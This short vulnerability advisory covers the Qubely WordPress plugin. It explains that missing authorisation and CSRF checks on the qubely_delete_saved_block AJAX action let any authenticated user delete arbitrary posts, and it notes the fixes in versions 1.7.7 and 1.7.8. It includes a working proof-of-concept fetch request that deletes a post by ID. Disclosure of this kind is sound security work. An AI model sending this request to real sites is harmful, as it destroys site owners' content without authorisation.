The plugin does not have authorisation and CSRF check on the qubely_delete_saved_block AJAX action, and does not ensure that the block to be deleted belong to the plugin, as a result, any authenticated users, such as subscriber can delete arbitrary posts Note: v1.7.7 added capability check, CSRF check were added in 1.7.8
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=qubely_delete_saved_block&block_id=1",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));